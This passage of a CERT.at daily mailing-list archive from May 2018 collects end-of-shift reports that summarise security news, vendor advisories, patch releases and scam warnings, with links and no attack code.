Guardium Big Data Intelligence (SonarG) is affected by a Session Identifier Not Updated vulnerability ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016513 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 24.05.2018
by Daily end-of-shift report 24 May '18

24 May '18

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 23-05-2018 18:00 − Donnerstag 24-05-2018 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter ===================== = News = ===================== ===================== = Vulnerabilities = ===================== ∗∗∗ Schneider Electric Patches XXE Vulnerability In Software ∗∗∗ --------------------------------------------- Schneider Electric on Tuesday issued fixes for a vulnerability its SoMachine Basic software that could result in disclosure and retrieval of arbitrary data. --------------------------------------------- https://threatpost.com/schneider-electric-patches-xxe-vulnerability-in-plcs… ∗∗∗ Bugtraq: [security bulletin] MFSBGN03808 rev.1 - Micro Focus UCMDB, Cross-Site Scripting ∗∗∗ --------------------------------------------- A potential security vulnerability has been identified in Micro Focus Universal CMDB/CMS and Micro Focus UCMDB Browser. The vulnerability could be remotely exploited to allow Cross-Site Scripting (XSS). References: CVE-2018-6495 - Corss-Site Scripting (XSS) --------------------------------------------- http://www.securityfocus.com/archive/1/542037 ∗∗∗ Vuln: Apache Batik CVE-2018-8013 Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- Apache Batik is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. Apache Batik 1.9.1 and prior versions are vulnerable. --------------------------------------------- http://www.securityfocus.com/bid/104252 ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (imagemagick), Fedora (curl, glibc, kernel, and thunderbird-enigmail), openSUSE (enigmail, knot, and python), Oracle (procps-ng), Red Hat (librelp, procps-ng, redhat-virtualization-host, rhev-hypervisor7, and unboundid-ldapsdk), Scientific Linux (procps-ng), SUSE (bash, ceph, icu, kvm, and qemu), and Ubuntu (procps and spice, spice-protocol). --------------------------------------------- https://lwn.net/Articles/755540/ ∗∗∗ IBM Security Bulletin: IBM i has released PTFs in response to the vulnerabilities known as Spectre and Meltdown. ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=nas8N1022433&myns=ibmi&mynp=O… ∗∗∗ IBM Security Bulletin: IBM has released the following fixes for AIX and VIOS in response to Speculative Store Bypass (SSB), also known as Variant 4. ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=isg3T1027700 ∗∗∗ IBM Security Bulletin: IBM Integrated Management Module II (IMM2) is affected by vulnerability in OpenSLP (CVE-2017-17833) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/home/docdisplay?lndocid=migr-5099807 ∗∗∗ IBM Security Bulletin: IBM Integrated Management Module (IMM) is affected by vulnerability in OpenSLP (CVE-2017-17833) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/home/docdisplay?lndocid=migr-5099806 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities affect db2exmig and db2exfmt tools shipped with IBM® Db2® (CVE-2018-1544, CVE-2018-1565) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016143 ∗∗∗ IBM Security Bulletin: Buffer overflow in the db2convert tool shipped with IBM® Db2® (CVE-2018-1515). ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016140 ∗∗∗ IBM Security Bulletin: Buffer overflow in IBM® Db2® tool db2licm (CVE-2018-1488). ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016141 ∗∗∗ IBM Security Bulletin: IBM® Db2® is vulnerable to buffer overflow (CVE-2018-1459). ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016142 ∗∗∗ IBM Security Bulletin: IBM® Db2® is affected by multiple file overwrite vulnerabilities (CVE-2018-1450, CVE-2018-1449, CVE-2018-1451, CVE-2018-1452) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016181 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect IBM® Db2®. ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22015656 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM MQ ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016278 ∗∗∗ IBM Security Bulletin: IBM NeXtScale Fan Power Controller (FPC) is affected by OpenSLP vulnerability (CVE-2017-17833) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/home/docdisplay?lndocid=MIGR-5099809 ∗∗∗ IBM Security Bulletin: IBM Chassis Management Module (CMM) is affected by OpenSLP vulnerability (CVE-2017-17833) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/home/docdisplay?lndocid=MIGR-5099808 ∗∗∗ IBM Security Bulletin: Multiple Vulnerabilities in IBM® Java SDK affects WebSphere Application Server April 2018 CPU ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016282 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 23.05.2018
by Daily end-of-shift report 23 May '18

23 May '18

===================== = End-of-Day report = ===================== Timeframe: Dienstag 22-05-2018 18:00 − Mittwoch 23-05-2018 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Backdoor Account Found in D-Link DIR-620 Routers ∗∗∗ --------------------------------------------- Security researchers have found a backdoor account in the firmware of D-Link DIR-620 routers that allows hackers to take over any device reachable via the Internet. --------------------------------------------- https://www.bleepingcomputer.com/news/security/backdoor-account-found-in-d-… ∗∗∗ Six Vulnerabilities Found in Dell EMC's Disaster Recovery System, One Critical ∗∗∗ --------------------------------------------- A pen-tester has found five vulnerabilities in Dell EMC RecoverPoint devices, including a critical RCE that could allow total system compromise. --------------------------------------------- https://threatpost.com/six-vulnerabilities-found-in-dell-emcs-disaster-reco… ∗∗∗ VPNFilter – is a malware timebomb lurking on your router? ∗∗∗ --------------------------------------------- A Cisco paper reports on zombie malware that has apparently infected more than 500,000 home routers. --------------------------------------------- https://nakedsecurity.sophos.com/2018/05/23/vpnfilter-is-a-malware-timebomb… ∗∗∗ An Old Trick with a New Twist: Cryptomining Through Disguised URL Shorteners ∗∗∗ --------------------------------------------- As we have previously discussed on this blog, surreptitious cryptomining continues to be a problem as new methods emerge to both evade and hasten the ease of mining at the expense of system administrators, website owners, and their visitors. Another Way Hackers are Tricking Website Visitors into Stealth Cryptomining [...] --------------------------------------------- https://blog.sucuri.net/2018/05/cryptomining-through-disguised-url-shortene… ∗∗∗ CPU-Sicherheitslücken Spectre-NG: Updates und Info-Links ∗∗∗ --------------------------------------------- Hersteller von Hardware, Betriebssystemen und Software stellen Webseiten mit Informationen und Sicherheitsupdates für die neuen Spectre-Lücken Spectre V3a und Spectre V4 bereit: Ein Überblick. --------------------------------------------- https://www.heise.de/ct/artikel/CPU-Sicherheitsluecken-Spectre-NG-Updates-u… ∗∗∗ Angreifer könnten aktuelle BMW-Modelle über Mobilfunk kapern ∗∗∗ --------------------------------------------- Sicherheitsforscher haben Sicherheitslücken im Infotainment-System von verschiedenen BMW-Modellen ausgenutzt und so die Kontrolle übernommen. Ein Angriff aus der Ferne ist aber ziemlich aufwendig. --------------------------------------------- https://www.heise.de/security/meldung/Angreifer-koennten-aktuelle-BMW-Model… ∗∗∗ Efail: Welche E-Mail-Clients sind wie sicher? ∗∗∗ --------------------------------------------- Nach Veröffentlichung der Efail-Lücken in PGP und S/MIME herrscht unter Anwendern, die ihre E-Mails verschlüsseln viel Verunsicherung. Wir haben uns im Detail angeschaut, welche E-Mail-Programme bisher wie abgesichert wurden. --------------------------------------------- https://www.heise.de/security/meldung/Efail-Welche-E-Mail-Clients-sind-wie-… ∗∗∗ Angebliche Lilihill DevCon GmbH versendet Schadsoftware ∗∗∗ --------------------------------------------- Betrüger versenden als angebliche Lilihill DevCon GmbH massenhaft Schadsoftware an Unternehmen. EmpfängerInnen finden eine E-Mail von sales(a)european-gmbh.pw mit dem Betreff "AW: Zahlung – EWT" in ihrem Posteingang. Darin werden Betroffene dazu aufgefordert eine ZIP-Datei aus dem Anhang der Mail zu öffnen. Doch Vorsicht! Die Datei enthält Schadsoftware und darf nicht geöffnet werden. --------------------------------------------- https://www.watchlist-internet.at/news/angebliche-lilihill-devcon-gmbh-vers… ===================== = Vulnerabilities = ===================== ∗∗∗ VMware Workstation und Fusion: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- Die Virtualisierungssoftware von VMware ermöglicht die simultane Ausführung von verschiedenen Betriebssystemen auf einem Host-System. --------------------------------------------- https://www.bsi-fuer-buerger.de/SharedDocs/Warnmeldungen/DE/TW/2018/05/warn… ∗∗∗ [20180505] - Core - XSS Vulnerabilities & additional hardening ∗∗∗ --------------------------------------------- Project: Joomla! SubProject: CMS Impact: Moderate Severity: Moderate Versions: 3.0.0 through 3.8.7 --------------------------------------------- https://developer.joomla.org/security-centre/733-20180505-core-xss-vulnerab… ∗∗∗ Synology-SA-18:25 SRM ∗∗∗ --------------------------------------------- A vulnerability allows remote attackers to inject arbitrary web script or HTML via a susceptible version of Synology Router Manager (SRM). --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_18_25 ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by CentOS (java-1.7.0-openjdk, java-1.8.0-openjdk, kernel, libvirt, and qemu-kvm), Debian (procps), Fedora (curl, mariadb, and procps-ng), Gentoo (samba, shadow, and virtualbox), openSUSE (opencv, openjpeg2, pdns, qemu, and wget), Oracle (java-1.8.0-openjdk and kernel), Red Hat (java-1.7.0-openjdk, java-1.8.0-openjdk, kernel, kernel-rt, libvirt, qemu-kvm, qemu-kvm-rhev, redhat-virtualization-host, and vdsm), Scientific Linux (java-1.7.0-openjdk, [...] --------------------------------------------- https://lwn.net/Articles/755386/ ∗∗∗ Vuln: Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities ∗∗∗ --------------------------------------------- http://www.securityfocus.com/bid/104239 ∗∗∗ Security Advisory - Three JSON Injection Vulnerabilities in Huawei Some Products ∗∗∗ --------------------------------------------- http://www.huawei.com//www.huawei.com/en/psirt/security-advisories/2018/hua… ∗∗∗ Security Advisory - Information Exposure Vulnerability in Some Smart Phones ∗∗∗ --------------------------------------------- http://www.huawei.com//www.huawei.com/en/psirt/security-advisories/2018/hua… ∗∗∗ Security Advisory - Authentication Bypass Vulnerability in Some Huawei Servers ∗∗∗ --------------------------------------------- http://www.huawei.com//www.huawei.com/en/psirt/security-advisories/2018/hua… ∗∗∗ Security Advisory - Numeric Errors Vulnerability in Some Huawei Products ∗∗∗ --------------------------------------------- http://www.huawei.com//www.huawei.com/en/psirt/security-advisories/2018/hua… ∗∗∗ IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM Netezza Firmware Diagnostics. ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22012498 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM License Metric Tool v9 and IBM BigFix Inventory v9 ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22015655 ∗∗∗ IBM Security Bulletin: Apache Tomcat vulnerability affects IBM Storwize V7000 Unified (CVE-2017-15706) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012273 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities affect the IBM Storwize V7000 Unified ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012293 ∗∗∗ IBM Security Bulletin: Multiple Vulnerabilities in IBM Java Runtime affects IBM Storwize V7000 Unified ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012274 ∗∗∗ IBM Security Bulletin: IBM Tivoli Netcool Impact is affected by a potential spoofing attack in IBM WebSphere Application Server vulnerability (CVE-2017-1788) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016546 ∗∗∗ IBM Security Bulletin: Multiple Samba vulnerability affects IBM Storwize V7000 Unified (CVE-2017-15275, CVE-2017-14746 ) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012289 ∗∗∗ IBM Security Bulletin: IBM Tivoli Netcool Impact is affected by a potential denial of service used by IBM WebSphere Application Server vulnerability (CVE-2017-12624) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016545 ∗∗∗ IBM Security Bulletin: Authenticated Users in IBM UrbanCode Deploy can Obtain Secure Properties (CVE-2017-1752) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg2C1000376 ∗∗∗ IBM Security Bulletin: Vulnerability in Apache Commons FileUpload affects Tivoli Netcool/OMNIbus WebGUI (CVE-2016-1000031) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016488 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 22.05.2018
by Daily end-of-shift report 22 May '18

22 May '18

===================== = End-of-Day report = ===================== Timeframe: Freitag 18-05-2018 18:00 − Dienstag 22-05-2018 18:00 Handler: Robert Waldner Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Sicherheitsupdates: Attacken auf DrayTek-Router ∗∗∗ --------------------------------------------- Unbekannte Angreifer haben es derzeit auf verschiedene Router von DrayTek abgesehen. Ist ein Übergriff erfolgreich, verbiegen sie die DNS-Einstellungen. --------------------------------------------- https://heise.de/-4053059 ===================== = Vulnerabilities = ===================== ∗∗∗ VU#180049: CPU hardware utilizing speculative execution may be vulnerable to cache side-channel attacks ∗∗∗ --------------------------------------------- CPU hardware utilizing speculative execution may be vulnerable to cache timing side-channel analysis. Also known as "Variant 4" or "SpectreNG". --------------------------------------------- http://www.kb.cert.org/vuls/id/180049 ∗∗∗ Firewall information leak to regular SSL VPN web portal users ∗∗∗ --------------------------------------------- A SSL VPN user logged in via the web portal can access internal FortiOS configuration information (eg: addresses) via specifically crafted URLs. --------------------------------------------- https://fortiguard.com/psirt/FG-IR-17-231 ∗∗∗ Xen Security Advisory CVE-2018-3639 / XSA-263 ∗∗∗ --------------------------------------------- However, in most configurations, within-guest information leak is possible. Mitigation for this generally depends on guest changes (for which you must consult your OS vendor) *and* on hypervisor support, provided in this advisory. --------------------------------------------- http://xenbits.xen.org/xsa/advisory-263.html ∗∗∗ HPSBHF02981 rev.3 - HPE Integrated Lights-Out 2, 3, 4, 5 (iLO 2, iLO 3, iLO 4, and iLO 5) and HPE Superdome Flex RMC - IPMI 2.0 RCMP+ Authentication Remote Password Hash Vulnerability (RAKP) ∗∗∗ --------------------------------------------- A potential security vulnerability has been identified in HPE Integrated Lights-Out 2, 3, 4, 5 (iLO 2, iLO 3, iLO 4, and iLO 5) and HPE Superdome Flex RMC. The vulnerability could be exploited to allow an attacker to gain unauthorized privileges and unauthorized access to privileged information. --------------------------------------------- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_n… ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (lib32-curl, lib32-libcurl-compat, lib32-libcurl-gnutls, libcurl-compat, and libcurl-gnutls), CentOS (firefox), Debian (imagemagick), Fedora (exiv2, LibRaw, and love), Gentoo (chromium), Mageia (kernel, librelp, and miniupnpc), openSUSE (curl, enigmail, ghostscript, libvorbis, lilypond, and thunderbird), Red Hat (Red Hat OpenStack Platform director), and Ubuntu (firefox). --------------------------------------------- https://lwn.net/Articles/755076/ ∗∗∗ Security vulnerabilities fixed in Thunderbird 52.8 ∗∗∗ --------------------------------------------- * CVE-2018-5183: Backport critical security fixes in Skia * CVE-2018-5184: Full plaintext recovery in S/MIME via chosen-ciphertext attack * CVE-2018-5154: Use-after-free with SVG animations and clip paths * CVE-2018-5155: Use-after-free with SVG animations and text paths ... --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/mfsa2018-13/ ∗∗∗ Security Notice -Statement on the Side-Channel Vulnerability Variants 3a and 4 ∗∗∗ --------------------------------------------- http://www.huawei.com//www.huawei.com/en/psirt/security-notices/2018/huawei… ∗∗∗ Security Advisory - Stack Overflow Vulnerability in Baseband Module of Some Huawei Smart Phones ∗∗∗ --------------------------------------------- http://www.huawei.com//www.huawei.com/en/psirt/security-advisories/2017/hua… ∗∗∗ IBM Security Bulletin: Vulnerability in Apache Tomcat affects IBM Platform Symphony, IBM Spectrum Symphony (CVE-2017-15698, CVE-2017-15706, CVE-2018-1323, CVE-2018-1305, CVE-2018-1304) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=isg3T1027633 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in the GSKit component of Tivoli Netcool/OMNIbus ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg21974627 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Tivoli Netcool/OMNIbus (Multiple CVEs) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22012415 ∗∗∗ IBM Security Bulletin: A vulnerability in Apache Commons FileUpload affects the IBM Performance Management product (CVE-2016-1000031) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016122 ∗∗∗ IBM Security Bulletin: Atlas eDiscovery Process Management is affected by Apache Open Source Commons FileUpload Vulnerability ∗∗∗ --------------------------------------------- https://www-01.ibm.com/support/docview.wss?uid=swg22014477 ∗∗∗ IBM Security Bulletin: Open Source Commons FileUpload Apache Vulnerabilities (CVE-2016-1000031) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016234 ∗∗∗ IBM Security Bulletin: A vulnerability in IBM WebSphere Application Server Liberty affects the IBM Performance Management product (CVE-2017-1681) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22015310 ∗∗∗ IBM Security Bulletin: Vulnerability in IBM Java SDK affects IBM SONAS ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012317 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Rational Directory Server (Tivoli) & Rational Directory Administrator ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016185 ∗∗∗ IBM Security Bulletin: Multiple Mozilla Firefox vulnerability issues in IBM SONAS ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012291 ∗∗∗ IBM Security Bulletin: Multiple Samba vulnerabilities affect IBM SONAS ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012292 ∗∗∗ Java Bouncy Castle vulnerability CVE-2015-7940 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K10105323 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 18.05.2018
by Daily end-of-shift report 18 May '18

18 May '18

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 17-05-2018 18:00 − Freitag 18-05-2018 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ DrayTek Router Zero-Day Under Attack ∗∗∗ --------------------------------------------- DrayTek, a Taiwan-based manufacturer of broadband CPE (Customer Premises Equipment) such as routers, switches, firewalls, and VPN devices, announced today that hackers are exploiting a zero-day vulnerability to change DNS settings on some of its routers. --------------------------------------------- https://www.bleepingcomputer.com/news/security/draytek-router-zero-day-unde… ∗∗∗ Business Email Compromise incidents, (Fri, May 18th) ∗∗∗ --------------------------------------------- Over the past 12 months we have seen a sharp increase in the number of incidents relating to the compromise of business emails. Often O365, but also some Gmail and on premise systems with webmail access. --------------------------------------------- https://isc.sans.edu/diary/rss/23669 ∗∗∗ MEWKit phishing campaign steals MyEtherWallet credentials to perform automated fund transfers ∗∗∗ --------------------------------------------- The cybercriminals who last April executed a man-in-the-middle attack on a Amazon DNS server to steal $152,000 in Ethereum cryptocurrency from MyEtherWallet.com pulled off their heist using a newly discovered phishing kit that includes an automated transfer system (ATS) malware component. --------------------------------------------- https://www.scmagazine.com/mewkit-phishing-campaign-steals-myetherwallet-cr… ∗∗∗ WordPress 4.9.6 Privacy and Maintenance Release ∗∗∗ --------------------------------------------- WordPress 4.9.6 is now available. This is a privacy and maintenance release. We encourage you to update your sites to take advantage of the new privacy features. --------------------------------------------- https://wordpress.org/news/2018/05/wordpress-4-9-6-privacy-and-maintenance-… ∗∗∗ Spectre-NG: Patches für Pfingstmontag erwartet ∗∗∗ --------------------------------------------- Achtung bei der Urlaubsplanung: Intel bereitet für den 21. Mai Updates gegen die ersten Spectre-Next-Generation-Lücken vor. Parallel dazu wird es dazu dann wohl auch endlich konkrete Informationen zu den Lücken geben. --------------------------------------------- https://www.heise.de/-4051247 ∗∗∗ Updates fixen böses Loch in Signals Desktop-App ∗∗∗ --------------------------------------------- Mit einfachen Nachrichten konnte ein Angreifer HTML-Code in die Desktop-App des verschlüsselnden Messengers einschleusen und damit sogar alle Nachrichten seines Opfers auslesen. Die aktuelle Version 1.11 beseitigt diese Lücken. --------------------------------------------- https://www.heise.de/-4052040 ∗∗∗ WhatsApp wird nicht kostenpflichtig ∗∗∗ --------------------------------------------- Aktuell kursiert auf WhatsApp die Nachricht, dass der Messenger-Dienst in Zukunft kostenpflichtig werde. Die angeblichen Kosten dafür können Nutzer/innen vermeiden, wenn sie den Hinweis darüber an zehn ihrer Kontakte weiterleiten. Diese Behauptungen sind falsch, denn bei dem Schreiben handelt es sich um einen erfundenen Kettenbrief. Er kann bedenkenlos gelöscht werden. --------------------------------------------- https://www.watchlist-internet.at/news/whatsapp-wird-nicht-kostenpflichtig/ ===================== = Vulnerabilities = ===================== ∗∗∗ Medtronic NVision Clinician Programmer ∗∗∗ --------------------------------------------- This medical advisory includes mitigations for a missing encryption of sensitive data vulnerability in Medtronics NVision Clinician Programmer. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSMA-18-137-01 ∗∗∗ GE PACSystems CPE305/310, CPE330, CPE400, RSTi-EP CPE 100, CPU320/CRU320, RXi ∗∗∗ --------------------------------------------- This advisory includes mitigations for an improper input validation vulnerability in the GE PACSystems CPE305/310, CPE330, CPE400, RSTi-EP CPE 100, CPU320/CRU320, RXi industrial Internet controllers. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-18-137-01 ∗∗∗ PHOENIX CONTACT FL SWITCH 3xxx/4xxx/48xx Series ∗∗∗ --------------------------------------------- This advisory includes mitigations for command injection, information exposure, and stack-based buffer overflow vulnerabilities in the PHOENIX CONTACT FL SWITCH 3xxx/4xxx/48xx Series. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-18-137-02 ∗∗∗ Delta Electronics Delta Industrial Automation TPEditor ∗∗∗ --------------------------------------------- This advisory includes mitigations for a heap-based buffer overflow vulnerability in the Delta Electronics Delta Industrial Automation TPEditor. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-18-137-04 ∗∗∗ Client for Open Enterprise Server 2 SP4 (IR8a) ∗∗∗ --------------------------------------------- Abstract: This is interim release (IR8a) of Client for Open Enterprise Server 2 SP4 (formerly "Novell Client 2 SP4 for Windows"). It includes fixes for problems found after Client for Open Enterprise Server 2 SP4 was released. It also includes support for Microsoft Windows Server 2016. --------------------------------------------- https://download.novell.com/Download?buildid=wdhtRhxCLdg~ ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (curl and zathura-pdf-mupdf), Debian (libmad and vlc), openSUSE (enigmail), Red Hat (collectd, Red Hat OpenStack Platform director, and sensu), and SUSE (firefox, ghostscript, and mysql). --------------------------------------------- https://lwn.net/Articles/754854/ ∗∗∗ Red Hat JBoss Enterprise Application Platform: Eine Schwachstelle ermöglicht die Ausführung beliebigen Programmcodes ∗∗∗ --------------------------------------------- https://adv-archiv.dfn-cert.de/adv/2018-0955/ ∗∗∗ IBM Security Bulletin: IBM StoredIQ is affected by a privilege escalation vulnerability ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016465 ∗∗∗ IBM Security Bulletin: IBM BigFix Platform is affected by multiple vulnerabities (CVE-2017-3735, CVE-2017-1000100, CVE-2017-1000254) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22011879 Next End-of-Day report: 2018-05-22 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 17.05.2018
by Daily end-of-shift report 17 May '18

17 May '18

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 16-05-2018 18:00 − Donnerstag 17-05-2018 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Oh, great, now theres a SECOND remote Rowhammer exploit ∗∗∗ --------------------------------------------- Send enough crafted packets to a NIC to put nasties into RAM, then the fun really starts Hard on the heels of the first network-based Rowhammer attack, some of the boffins involved in discovering Meltdown/Spectre have shown off their own technique for flipping bits using network requests. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2018/05/17/nethammer_s… ∗∗∗ The Rowhammer: the Evolution of a Dangerous Attack ∗∗∗ --------------------------------------------- The Rowhammer Attack Back in 2015, security researchers at Google's Project Zero team demonstrated how to hijack an Intel-compatible PCs running Linux by exploiting the physical weaknesses in certain varieties of DDR DRAM (double data rate dynamic random-access memory) chips. The attack technique devised by the experts was dubbed "Rowhammer" [...] --------------------------------------------- http://resources.infosecinstitute.com/rowhammer-evolution-dangerous-attack-… ∗∗∗ TeleGrab - Grizzly Attacks on Secure Messaging ∗∗∗ --------------------------------------------- This post was written by Vitor Ventura with contributions from Azim KhodjibaevIntroductionOver the past month and a half, Talos has seen the emergence of a malware that collects cache and key files from end-to-end encrypted instant messaging service Telegram. This malware was first seen on April 4, 2018, with a second variant emerging on April 10. --------------------------------------------- https://blog.talosintelligence.com/2018/05/telegrab.html ∗∗∗ Mahnungen über 479,16 Euro der DEBTSOLUTIONS LTD ignorieren! ∗∗∗ --------------------------------------------- Betroffene Internetnutzer/innen finden eine angebliche letzte Zahlungsaufforderung vor einem Mahnverfahren von der Debtsolutions LTD in Ihrem Posteingang. Als Begründung wird genannt, dass eine betrügerische Rechnung der MOVIES DARLING LTD nicht bezahlt wurde. Aus diesem Grund sollen die Empfänger/innen 479,16 Euro an die Debtsolutions LTD überweisen. Doch Vorsicht! Auch dieses Schreiben ist betrügerisch und der Geldbetrag sollte auf keinen Fall bezahlt werden. --------------------------------------------- https://www.watchlist-internet.at/news/mahnungen-ueber-47916-euro-der-debts… ===================== = Vulnerabilities = ===================== ∗∗∗ Sicherheitsupdates: Cisco vergisst mal wieder Standard-Passwort in Netzwerk-Software ∗∗∗ --------------------------------------------- Cisco hat wichtige Patches veröffentlicht und stopft damit Sicherheitslücken in seinem Produktportfolio. Drei Lücken gelten als äußerst kritisch. --------------------------------------------- https://www.heise.de/meldung/Sicherheitsupdates-Cisco-vergisst-mal-wieder-S… ∗∗∗ SECURITY BULLETIN: Trend Micro Endpoint Application Control FileDrop Directory Traversal Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- Trend Micro has released a new critical patch (CP) for Trend Micro Endpoint Application Control 2.0 SP1. This CP resolves a FileDrop directory traversal remote code execution (RCE) vulnerability. --------------------------------------------- https://success.trendmicro.com/solution/1119811 ∗∗∗ [R1] Industrial Security 1.1.0 Fixes One Third-party Vulnerability ∗∗∗ --------------------------------------------- Industrial Security leverages third-party software to help provide underlying functionality. One of the third-party components (OpenSSL) were found to contain vulnerabilities, and updated versions have been made available by the providers. --------------------------------------------- https://www.tenable.com/security/tns-2018-06 ∗∗∗ [R1] Nessus Network Monitor 5.5.0 Fixes One Third-party Vulnerability ∗∗∗ --------------------------------------------- Nessus Network Monitor leverages third-party software to help provide underlying functionality. One of the third-party components (OpenSSL) were found to contain vulnerabilities, and updated versions have been made available by the providers. --------------------------------------------- https://www.tenable.com/security/tns-2018-07 ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (runc), Debian (curl), Fedora (xdg-utils), Mageia (firefox), openSUSE (libreoffice, librsvg, and php5), Slackware (curl and php), SUSE (curl, firefox, kernel, kvm, libapr1, libvorbis, and memcached), and Ubuntu (curl, dpdk, php5, and qemu). --------------------------------------------- https://lwn.net/Articles/754773/ ∗∗∗ Vuln: Symantec IntelligenceCenter CVE-2017-18268 Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- http://www.securityfocus.com/bid/104164 ∗∗∗ Vuln: Symantec SSLV CVE-2017-15533 Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- http://www.securityfocus.com/bid/104163 ∗∗∗ 2018-05-15: Vulnerability in Welcome IP-Gateway - Command Injection, Missing Session Management, Clear Text Passwords in Cookies ∗∗∗ --------------------------------------------- http://search.abb.com/library/Download.aspx?DocumentID=ABB-VU-EPBP-R-2505&L… ∗∗∗ FortiWeb Recursive URL Decoding is not enabled by default ∗∗∗ --------------------------------------------- https://fortiguard.com/psirt/FG-IR-18-058 ∗∗∗ FortiOS SSL Deep-Inspection badssl.com Compliance ∗∗∗ --------------------------------------------- https://fortiguard.com/psirt/FG-IR-17-160 ∗∗∗ IBM Security Bulletin: Vulnerabilities in Linux Kernel affect 